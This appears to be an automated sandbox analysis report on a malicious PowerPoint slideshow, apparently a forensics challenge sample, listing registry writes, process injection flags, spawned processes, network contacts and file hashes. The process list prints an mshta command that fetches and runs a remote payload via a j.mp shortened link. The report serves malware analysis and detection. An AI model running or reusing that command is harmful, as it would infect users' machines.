Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A79-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A50-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493464-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493466-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F5-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493451-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F6-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493473-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347F-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F0-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6F-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493455-5A91-11CF-8700-00AA0060263B}\ = "DocumentWindows" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A70-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "LegendEntry" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E552-4FF5-48F4-8215-5505F990966F}\ = "Player" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A69-F07E-4CA4-AF6F-BEF486AA4E6F} C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ping.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3040 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\splwow64.exe
PID 3040 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\splwow64.exe
PID 3040 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\splwow64.exe
PID 3040 wrote to memory of 2004 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\splwow64.exe
PID 3040 wrote to memory of 2616 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\mSHtA.exe
PID 3040 wrote to memory of 2616 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\mSHtA.exe
PID 3040 wrote to memory of 2616 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\mSHtA.exe
PID 3040 wrote to memory of 2616 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\mSHtA.exe
PID 3040 wrote to memory of 2436 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\ping.exe
PID 3040 wrote to memory of 2436 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\ping.exe
PID 3040 wrote to memory of 2436 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\ping.exe
PID 3040 wrote to memory of 2436 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Windows\SysWOW64\ping.exe
PID 3040 wrote to memory of 2444 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
PID 3040 wrote to memory of 2444 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
PID 3040 wrote to memory of 2444 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
PID 3040 wrote to memory of 2444 N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office14\winword.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\RETO-MALWAREDFIR.pps"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\mSHtA.exe

mSHtA http://12384928198391823%[email protected]/hdkjashdkasbctdgjsa

C:\Windows\SysWOW64\ping.exe

ping

C:\Program Files (x86)\Microsoft Office\Office14\winword.exe

winword

Network

Country Destination Domain Proto
US 8.8.8.8:53 j.mp udp
US 67.199.248.16:80 j.mp tcp
US 8.8.8.8:53 iknowyoudidntlikeme.blogspot.com udp
GB 142.250.200.1:443 iknowyoudidntlikeme.blogspot.com tcp
US 8.8.8.8:53 www.blogger.com udp
GB 142.250.178.9:443 www.blogger.com tcp
GB 142.250.178.9:443 www.blogger.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 resources.blogblog.com udp
NL 142.250.27.84:443 accounts.google.com tcp
GB 142.250.178.9:443 resources.blogblog.com tcp
GB 142.250.178.9:443 resources.blogblog.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp

Files

memory/3040-0-0x000000002D8B1000-0x000000002D8B2000-memory.dmp

memory/3040-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3040-2-0x00000000729ED000-0x00000000729F8000-memory.dmp

memory/3040-10-0x0000000005380000-0x0000000005480000-memory.dmp

memory/3040-12-0x0000000005380000-0x0000000005480000-memory.dmp

memory/3040-11-0x0000000005380000-0x0000000005480000-memory.dmp

memory/3040-99-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3040-100-0x00000000729ED000-0x00000000729F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 731d90f1236437e4436846242a2a7767
SHA1 e99999abe25bbb3a4c0e2048c23ce8989ea5481a
SHA256 8e573fe133392fbcbaed3357f38004da301268cf95d7740c3414ae2f2a1a6373
SHA512 17f23a3bd1d124bd70a1cbf605a18c24ae9b404acaf9762cbf93f82efac3af4ef49c1cdc464c63883cbfcad4cceff4613458c023d269ddff4c2aa95dfe014e66